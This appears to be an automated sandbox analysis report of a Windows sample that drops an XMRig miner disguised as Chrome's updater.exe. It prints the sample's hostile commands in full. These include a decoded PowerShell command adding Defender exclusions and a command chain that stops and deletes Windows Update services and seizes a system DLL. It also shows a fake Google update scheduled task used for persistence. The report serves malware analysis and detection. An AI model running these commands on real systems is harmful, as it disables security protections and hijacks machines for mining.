Analysis
- max time kernel: 300s
- max time network: 270s
- platform: windows7_x64
- resource: win7-20220718-en
- resource tags: arch:x64 arch:x86 image:win7-20220718-en locale:en-us os:windows7-x64 system
- submitted: 05-08-2022 22:15
Behavioral task: behavioral1
Sample: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Resource: win7-20220718-en
General
- Target: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
- Size: 7.1MB
- MD5: 2144e985a1fb8a18636dee1b1fcf096f
- SHA1: fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
- SHA256: 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
- SHA512: 48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security (reg.exe)
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (updater.exe)
XMRig Miner payload 13 IoCs
Processes:
- behavioral1/memory/1320-160-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-162-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-164-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-165-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-166-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-168-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-170-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-171-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-172-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-174-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-176-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-178-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
- behavioral1/memory/1320-180-0x0000000140000000-0x0000000140809000-memory.dmp (yara_rule: xmrig)
Drops file in Drivers directory 2 IoCs
Processes:
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (conhost.exe)
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (conhost.exe)
Executes dropped EXE 1 IoCs
Processes:
- PID 968 updater.exe
Possible privilege escalation attempt 4 IoCs
Processes:
- PID 1980 takeown.exe
- PID 1920 icacls.exe
- PID 1692 takeown.exe
- PID 1752 icacls.exe
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (updater.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (updater.exe)
Loads dropped DLL 1 IoCs
Processes:
- PID 1108 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
Processes:
- PID 1980 takeown.exe
- PID 1920 icacls.exe
- PID 1692 takeown.exe
- PID 1752 icacls.exe
Processes:
- behavioral1/memory/1676-54-0x0000000000400000-0x0000000001066000-memory.dmp (yara_rule: themida)
- behavioral1/memory/1676-55-0x0000000000400000-0x0000000001066000-memory.dmp (yara_rule: themida)
- behavioral1/memory/1676-57-0x0000000000400000-0x0000000001066000-memory.dmp (yara_rule: themida)
- \Program Files\Google\Chrome\updater.exe (yara_rule: themida)
- C:\Program Files\Google\Chrome\updater.exe (yara_rule: themida)
- behavioral1/memory/968-95-0x0000000000400000-0x0000000001066000-memory.dmp (yara_rule: themida)
- behavioral1/memory/968-100-0x0000000000400000-0x0000000001066000-memory.dmp (yara_rule: themida)
- behavioral1/memory/968-102-0x0000000000400000-0x0000000001066000-memory.dmp (yara_rule: themida)
- C:\Program Files\Google\Chrome\updater.exe (yara_rule: themida)
Checks whether UAC is enabled 2 IoCs
Processes:
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (updater.exe)
Drops file in System32 directory 2 IoCs
Processes:
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
- PID 1676 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
- PID 968 updater.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
- PID 2012 (conhost.exe) set thread context of PID 1320 (explorer.exe)
Drops file in Program Files directory 3 IoCs
Processes:
- File created: C:\Program Files\Google\Chrome\updater.exe (conhost.exe)
- File opened for modification: C:\Program Files\Google\Chrome\updater.exe (conhost.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (conhost.exe)
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
- PID 472 sc.exe
- PID 1048 sc.exe
- PID 1732 sc.exe
- PID 1320 sc.exe
- PID 1704 sc.exe
- PID 1552 sc.exe
- PID 1544 sc.exe
- PID 1576 sc.exe
- PID 1276 sc.exe
- PID 1752 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c011ebae29a9d801 (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (conhost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (conhost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
Modifies registry key 1 TTPs 18 IoCs
Processes:
- reg.exe PIDs: 1456, 1652, 1400, 1260, 584, 1568, 636, 1440, 1668, 916, 472, 968, 584, 1172, 1440, 1672, 576, 1744
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
- PID 1652 powershell.exe
- PID 1688 conhost.exe
- PID 1944 powershell.exe
- PID 2012 conhost.exe
- PID 1320 explorer.exe (repeated for every remaining entry)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
- PID 464
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
- Token: SeDebugPrivilege, PID 1652 powershell.exe
- Token: SeShutdownPrivilege, PID 1804 powercfg.exe
- Token: SeShutdownPrivilege, PID 1736 powercfg.exe
- Token: SeDebugPrivilege, PID 1688 conhost.exe
- Token: SeShutdownPrivilege, PID 1488 powercfg.exe
- Token: SeShutdownPrivilege, PID 852 powercfg.exe
- Token: SeTakeOwnershipPrivilege, PID 1980 takeown.exe
- Token: SeDebugPrivilege, PID 1944 powershell.exe
- Token: SeShutdownPrivilege, PID 1768 powercfg.exe
- Token: SeShutdownPrivilege, PID 1784 powercfg.exe
- Token: SeShutdownPrivilege, PID 1544 powercfg.exe
- Token: SeTakeOwnershipPrivilege, PID 1692 takeown.exe
- Token: SeDebugPrivilege, PID 2012 conhost.exe
- Token: SeLockMemoryPrivilege, PID 1320 explorer.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Parent PID (process) wrote to memory of target PID (process): number of identical entries
- PID 1676 (58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe) wrote to memory of 1688 (conhost.exe): 4
- PID 1688 (conhost.exe) wrote to memory of 1652 (powershell.exe): 3
- PID 1688 (conhost.exe) wrote to memory of 436 (cmd.exe): 3
- PID 1688 (conhost.exe) wrote to memory of 524 (cmd.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1544 (sc.exe): 3
- PID 524 (cmd.exe) wrote to memory of 1804 (powercfg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1576 (sc.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1048 (sc.exe): 3
- PID 524 (cmd.exe) wrote to memory of 1736 (powercfg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1276 (sc.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1752 (sc.exe): 3
- PID 524 (cmd.exe) wrote to memory of 1488 (powercfg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 636 (reg.exe): 3
- PID 524 (cmd.exe) wrote to memory of 852 (powercfg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1672 (reg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1440 (reg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1260 (reg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 576 (reg.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1980 (takeown.exe): 3
- PID 436 (cmd.exe) wrote to memory of 1920 (icacls.exe): 3
- PID 1688 (conhost.exe) wrote to memory of 1560 (cmd.exe): 3
Processes
-
Level 1: C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Windows\System32\conhost.exe
Command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
Decoded (base64 of UTF-16LE): <#pa#> Add-MpPreference <#adjz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ws#> -Force <#ry#>
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\system32\sc.exe
Command line: sc stop UsoSvc
- Launches sc.exe
-
Level 4: C:\Windows\system32\sc.exe
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
Level 4: C:\Windows\system32\sc.exe
Command line: sc stop wuauserv
- Launches sc.exe
-
Level 4: C:\Windows\system32\sc.exe
Command line: sc stop bits
- Launches sc.exe
-
Level 4: C:\Windows\system32\sc.exe
Command line: sc stop dosvc
- Launches sc.exe
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies security service
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
Level 4: C:\Windows\system32\takeown.exe
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\system32\icacls.exe
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
Level 4: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
Level 3: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- Suspicious use of WriteProcessMemory
-
Level 4: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
- Creates scheduled task(s)
-
Level 3: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
-
Level 4: C:\Windows\system32\schtasks.exe
Command line: schtasks /run /tn "GoogleUpdateTaskMachineQC"
-
Level 1: C:\Windows\system32\taskeng.exe
Command line: taskeng.exe {54243AE5-4251-49D2-B2D9-33784D7803C6} S-1-5-18:NT AUTHORITY\System:Service:
- Loads dropped DLL
-
Level 2: C:\Program Files\Google\Chrome\updater.exe
Command line: "C:\Program Files\Google\Chrome\updater.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
Level 3: C:\Windows\System32\conhost.exe
Command line: "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
Decoded (base64 of UTF-16LE): <#pa#> Add-MpPreference <#adjz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ws#> -Force <#ry#>
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
Level 5: C:\Windows\system32\sc.exe
Command line: sc stop UsoSvc
- Launches sc.exe
-
Level 5: C:\Windows\system32\sc.exe
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
Level 5: C:\Windows\system32\sc.exe
Command line: sc stop wuauserv
- Launches sc.exe
-
Level 5: C:\Windows\system32\sc.exe
Command line: sc stop bits
- Launches sc.exe
-
Level 5: C:\Windows\system32\sc.exe
Command line: sc stop dosvc
- Launches sc.exe
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
- Modifies registry key
-
Level 5: C:\Windows\system32\takeown.exe
Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
Level 5: C:\Windows\system32\icacls.exe
Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
- Possible privilege escalation attempt
- Modifies file permissions
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
- Modifies registry key
-
Level 5: C:\Windows\system32\reg.exe
Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
- Modifies registry key
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
-
Level 5: C:\Windows\system32\schtasks.exe
Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
-
Level 4: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
Level 5: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-ac 0
-
Level 5: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
Level 5: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 5: C:\Windows\system32\powercfg.exe
Command line: powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
Level 4: C:\Windows\System32\conhost.exe
Command line: C:\Windows\System32\conhost.exe "bmkeytcye"
-
Level 4: C:\Windows\explorer.exe
Command line: C:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr56
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe
Filesize: 7.1MB
MD5: 2144e985a1fb8a18636dee1b1fcf096f
SHA1: fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
